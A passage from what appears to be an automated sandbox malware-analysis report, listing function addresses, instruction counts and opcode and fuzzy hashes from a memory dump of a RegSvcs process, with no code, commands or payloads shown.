                                                              • Instruction Fuzzy Hash: 9A3149B19402519BDB35AF58CC45B6D7BF4FF90304F4481A9D9859F382EA749981CB90
                                                              Function 0164C3CD Relevance: .1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                              • Instruction ID: de9f490d128f5786fb6e4ebb5d244d9013a767ea527e7b445266f34cc5ea3445
                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                              • Instruction Fuzzy Hash: 8F21D836602653ABCB25AB958D00ABEBBB5EF90610F40841EFB958A791F734D950C760
                                                              Function 0158E420 Relevance: .1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                              • Instruction ID: fe3a8bf4a3efd84b5eaffddbec6fc85d6e73d3d38830d6794b31254efbaaedea
                                                              • Opcode Fuzzy Hash: 354afac749a2bbf6f3e03869e56b636bb4f44528a6a0debd250dafc91a6c3722
                                                              • Instruction Fuzzy Hash: 6631D831A4012D9BDB31EB18CC42FEE77B9FB55740F0105A1E649BF1A0D6749E808FA0
                                                              Function 015C4588 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                              • Instruction ID: 66ab33c9670edfada6e926aa1718c6cbef5dfb5c4339c27f3bf465f0bfcddaec
                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                              • Instruction Fuzzy Hash: DE217135A00649EFCB15CFA8C990E8EBBB5FF48B14F108069EE159F245D671EA458B90
                                                              Function 015C44B0 Relevance: .1, Instructions: 87COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf4306732580cb600bca0ffed2973145c2a9b416f06f930ea5e457b843483b2c
                                                              • Instruction ID: 13c57b55f67d29f0a53093da5c1b65e5c44caa1c67666599f7d4cf582b7fa368
                                                              • Opcode Fuzzy Hash: bf4306732580cb600bca0ffed2973145c2a9b416f06f930ea5e457b843483b2c
                                                              • Instruction Fuzzy Hash: 47219C726047469FCB22CE58C890F6BB7E4FB98B60F01492DF9559F641D730E9008BA2
                                                              Function 0158E388 Relevance: .1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                              • Instruction ID: 87c50d7f6a57eb73072e724c25bf787449f2e21865c87c76f29d221717bd108a
                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                              • Instruction Fuzzy Hash: 8E318931600605EFE721DBA8C885F6AB7F9FF85354F1049A9E556DB290E730EE01CB50
                                                              Function 0160E609 Relevance: .1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec92ee4d45843b2f76b3669bb9937ca70ca8f0e94d9d583d3ecd238965073151
                                                              • Instruction ID: 5a6b835ab163ebab239fd1cc7e3fafa05edea6e321e7cbe34745ceca31b8f2cf
                                                              • Opcode Fuzzy Hash: ec92ee4d45843b2f76b3669bb9937ca70ca8f0e94d9d583d3ecd238965073151
                                                              • Instruction Fuzzy Hash: 3B31B175A20225DFCB19CF1CDC849AEB7B5FF84304B154959F8059B391EB32E941CB90
                                                              Function 01598D59 Relevance: .1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                              • Instruction ID: 5e8473c1b22b99182b6eb1abe60f95c20215494faff8f45e6db700b1487b3c23
                                                              • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                              • Instruction Fuzzy Hash: 282136B2601B46DBEB26976CC818B297BF4BF41794F0D04A8DF028F6D2E3A8DC40C251
                                                              Function 016106F1 Relevance: .1, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 532ea10c2041305e152eaa4ec4a075fc586509167159ec92dbd7ec7168c59030
                                                              • Instruction ID: 2adaf83f405273681ce465e72cee9511e8100c845d1716994c442b882f2901d0
                                                              • Opcode Fuzzy Hash: 532ea10c2041305e152eaa4ec4a075fc586509167159ec92dbd7ec7168c59030
                                                              • Instruction Fuzzy Hash: 10219F7190062AEBCF20DF59CC81ABEB7F8FF48740B544069F941AB254D778AD52CBA0
                                                              Function 0161019F Relevance: .1, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                              • Instruction ID: d7898c2948ecda0f022a93478653c16009bdb533968798bff0a03873dd6775a2
                                                              • Opcode Fuzzy Hash: 24115eb9b3646ed883283e14aa062764bc229fc0d017dd35135c7bddd950c7f7
                                                              • Instruction Fuzzy Hash: B721AB71600606AFDB15DBACCC40E6AB7A8FF98740F184069F904DB790E738ED40CBA8
                                                              Function 01610283 Relevance: .1, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                              • Instruction ID: 7f7490ab3871d4e96a414b02490c872cfa2e7fe13e0f9646b239648c33bd0cec
                                                              • Opcode Fuzzy Hash: 61765cd93ec7c7de0957193f72756b97637fcf33c520530feae5f8987caf2c56
                                                              • Instruction Fuzzy Hash: 7C21CF729042469BDB11EF59CC44B9BBBDCBF90244F0C8456B980CB265D730C985C6A2
                                                              Function 015B2835 Relevance: .1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ece723b84e773474e9b553a4366304decff0d2afac8c7319a6bee781f51f314c
                                                              • Instruction ID: 62c692fd7fe2b5dd38381a9d7c6a7f9424f3619884be9736f88de0f1028cf029
                                                              • Opcode Fuzzy Hash: ece723b84e773474e9b553a4366304decff0d2afac8c7319a6bee781f51f314c
                                                              • Instruction Fuzzy Hash: 34212931644782DBE722576C8C44B6C7BD4BF41774F280368FA25DF6E2D768D8018262
                                                              Function 015CA30B Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                              • Instruction ID: a49831a8d1085c2829e30a288e6280697b7746f30d199bb15d81aa747c9c2aa4
                                                              • Opcode Fuzzy Hash: 9f7ed5e824366f0ba35174a8e95daf81f5a06480f940dbb3697c0570ce006708
                                                              • Instruction Fuzzy Hash: 0721AC75250602AFC72ADF69CC00B56B7F5BF48B08F24846CA509CF761E371E842CB94
                                                              Function 01610946 Relevance: .1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d8daf805e5a4965dbea2630a209feb804871d0b69b51d144fe61d69c38832fc
                                                              • Instruction ID: 8a711b82835785a07e3fa9326d7bd2cd4f2876440fb25744396bf4365aa41021
                                                              • Opcode Fuzzy Hash: 9d8daf805e5a4965dbea2630a209feb804871d0b69b51d144fe61d69c38832fc
                                                              • Instruction Fuzzy Hash: B421E9B1E00359ABCB20DFAAD8919AEFBF9FF98610F10022EE505A7354D7709941CB54
                                                              Function 016280A8 Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                              • Instruction ID: 17cd3c0c25b4add35bb98c69e32fd9838bef8cc3ed440d2fddf62102093729ae
                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                              • Instruction Fuzzy Hash: FA216772A0061AAFDB129F98CC44BAEBBFAFF98315F204859F940A7291D734D9518F50
                                                              Function 015C0124 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction ID: a52da0de00a237fec570c8a361c0cfcf9d772a5a4def2b58937aab115106e541
                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction Fuzzy Hash: 62119D76601606EFE7229E99DC41FAABBB8FBD0B64F10442DF6049F190E671ED44CB60
                                                              Function 01598770 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 79f7db2cd7048835c916828634870bfb69cf9e05f3d1e55f1aa11cce05d653d7
                                                              • Instruction ID: 26653dea074a35aa9936b0afbb7312ab3fb00b0440567347c36d02360926026e
                                                              • Opcode Fuzzy Hash: 79f7db2cd7048835c916828634870bfb69cf9e05f3d1e55f1aa11cce05d653d7
                                                              • Instruction Fuzzy Hash: E611C1717006199BDF15CF4DC5C0A6EBBE9BF8B710B1980ADEE089F205D6B2D901C792
                                                              Function 015CAAEE Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                              • Instruction ID: 611ba9e9afeb7b27bd05996c38e9c3f50ce21f5b26e28704dde88c60233a865f
                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                              • Instruction Fuzzy Hash: A7217972640A49DFD7268F89C540A6AFBF6FB94F14F14887DE54A9B610E730EC01CB90
                                                              Function 015980E9 Relevance: .1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3189717abd5d2ece819a3952968cf4d75001b7b6541e76b60ee997c67279e21b
                                                              • Instruction ID: ae4264008e0431efb1f924fe278661b604875b370e048980796cec4da2cabad1
                                                              • Opcode Fuzzy Hash: 3189717abd5d2ece819a3952968cf4d75001b7b6541e76b60ee997c67279e21b
                                                              • Instruction Fuzzy Hash: 8421AE75A0020ADFCB14CFA8C580AAEBBF5FB89318F20416DD105AB310CB71AD06DBD1
                                                              Function 015C674D Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 785c49ed786e517d2cf8ec11dde2897a27df277b7f437ee395b020f4b2444b08
                                                              • Instruction ID: f80a017e9de4d7c4308ff7ae6d2315ac88f4c1c3f8d84d6e625833a162df3091
                                                              • Opcode Fuzzy Hash: 785c49ed786e517d2cf8ec11dde2897a27df277b7f437ee395b020f4b2444b08
                                                              • Instruction Fuzzy Hash: BB218E75510A01EFD7308FA9C840F66B7E8FF84650F40882DE69ACB751EB30A950CB60
                                                              Function 01626870 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2e316ae9d4a45993a61422827938d7770c825e34b1d9b3f3793cea5d9f40c56
                                                              • Instruction ID: 8d66b9970faac24d37c7256b393766a9dd7ff18d69e59d9648246936c7defeda
                                                              • Opcode Fuzzy Hash: d2e316ae9d4a45993a61422827938d7770c825e34b1d9b3f3793cea5d9f40c56
                                                              • Instruction Fuzzy Hash: EA11C132740926EFC722CB69CD40F9AB7A8FF95750F014025FA01DB250DA74E801CBA0
                                                              Function 015BE8C0 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad9dc9a84a890576bdbc42aabc977f8fc3f9fae4cdba6f36ba6db05e9403e9b4
                                                              • Instruction ID: 47927ba192d16f35245fa5a44b7bda112ea4005cde227cf2a620c6de6065e0e7
                                                              • Opcode Fuzzy Hash: ad9dc9a84a890576bdbc42aabc977f8fc3f9fae4cdba6f36ba6db05e9403e9b4
                                                              • Instruction Fuzzy Hash: E4110C333041159FCB1ADB29CC91ABF7297FFD5374B29452DE522CF291DA309801C290
                                                              Function 015C66B0 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cf96612c7d02de0bfc37c423ef4503b4d961e97cd44c0e97370d561ed905f209
                                                              • Instruction ID: 56f2e79b9dea4b6c6141773c6629ede5738ce081dd60d4eb9ad9b870a5c9031a
                                                              • Opcode Fuzzy Hash: cf96612c7d02de0bfc37c423ef4503b4d961e97cd44c0e97370d561ed905f209
                                                              • Instruction Fuzzy Hash: 0C119E76A01206EFCB25DF99DA80A5EBBF9BF94A50F45847DD9099F311E630DE00CB90
                                                              Function 0165A8E4 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                              • Instruction ID: 6ccaec65de8db60055f3342a3422f3f4e981c19623aefff217b71223d1eadc99
                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                              • Instruction Fuzzy Hash: 9E11B236A10915AFDB19CB98CC05A9DBBB6EF84210F058269EC5597340E671AD51CBD0
                                                              Function 01590AD0 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                              • Instruction ID: d388630ee27b3b424baf9eb6d9eab769d256ec8d615fdd8c66678083530c345b
                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                              • Instruction Fuzzy Hash: 682108B5A40B059FD3A0CF29D440B56BBF4FB48720F10492EE98ACBB40E371E814CB90
                                                              Function 0161E7E1 Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                              • Instruction ID: f68f80fbf10fde36823054c983b466dcea64c2ecbe22a08d17bbc8bf7fff6f13
                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                              • Instruction Fuzzy Hash: 9111A331600601EFEB729F48CC40B5A7BA6EF45754F0A842CEE0A9B254DB32DC41DB90
                                                              Function 015B27ED Relevance: .1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c5ff0c1771f745fe4a125b65f194f984a709091905706666a83f326a014076c
                                                              • Instruction ID: 84bf8afc16bb8a098deaf156069a365df024df84d0b9fd31e53b3e85ad9f430d
                                                              • Opcode Fuzzy Hash: 7c5ff0c1771f745fe4a125b65f194f984a709091905706666a83f326a014076c
                                                              • Instruction Fuzzy Hash: 9601C431645786ABE316A66EDC84F6B6ADCFF80694F050469FA058F291E954EC00C2B2
                                                              Function 01594690 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6e6a53e21b5c00f5d5f8f4f28dd0037219c923c50cca5663943308952101bb2d
                                                              • Instruction ID: 244175d609a725ce51eeee8f87385354a03e2a5066193adf768850df777b82ff
                                                              • Opcode Fuzzy Hash: 6e6a53e21b5c00f5d5f8f4f28dd0037219c923c50cca5663943308952101bb2d
                                                              • Instruction Fuzzy Hash: 9C119E36250649AFDF258F59DA80B6E7BA8FB8A664F004519F9058F250C770EC42CFA1
                                                              Function 015C6620 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 373863abb50ede1054f3fd6493a8c1b5bf2c7132964e881f9903f1c06a1e273c
                                                              • Instruction ID: e5342f020b8916f677024e7edf49d9ad9c0b1bcd77342ef213340259a09b058b
                                                              • Opcode Fuzzy Hash: 373863abb50ede1054f3fd6493a8c1b5bf2c7132964e881f9903f1c06a1e273c
                                                              • Instruction Fuzzy Hash: 9411C276A00616AFDB22EF99CD80B5EFBB8FF84B40F500059DA05AF300D730AE418B90
                                                              Function 015BEA2E Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a60a82e954c77d07fc353beb2c52d7106a1c59dd77f2dda213524be9cd5534e
                                                              • Instruction ID: 1f10018a3fcfc6d17f53d6faa32e7a724fcc541956f479d344c85e58013d7863
                                                              • Opcode Fuzzy Hash: 6a60a82e954c77d07fc353beb2c52d7106a1c59dd77f2dda213524be9cd5534e
                                                              • Instruction Fuzzy Hash: 95019275500106AFC725DF19D889FAABBF9FBC5314F24826AE1068F261C7B09C42CB94
                                                              Function 015BE53E Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                              • Instruction ID: 3d5dd3244ffd33f6b76805e7f1141ab5cf7d056e5c3869d5876b5018f258b690
                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                              • Instruction Fuzzy Hash: 0A11E5722416C2DBE723976CC984BAD7BD4FB41788F1D04A6DF419FA92F728C842C250
                                                              Function 0161E75D Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                              • Instruction ID: 576ec7f1dfc6cd12722fbbcdc8d108c0846a4246f2c1fbc9c855165b51ff611d
                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                              • Instruction Fuzzy Hash: 8A019636700106AFF7265F58CD00F6A7AA9FB85750F098428EE059B264E772DD41C790
                                                              Function 0158A250 Relevance: .1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                              • Instruction ID: edbbc46b62c62522605a151ab69509e8ab13b220221d75151d4d5b8c7b8bef4b
                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                              • Instruction Fuzzy Hash: FF0126314047229BDB319F19D840A3A7BE4FF557607008A6EFD96AF281D331D400CB60
                                                              Function 0160E1D0 Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
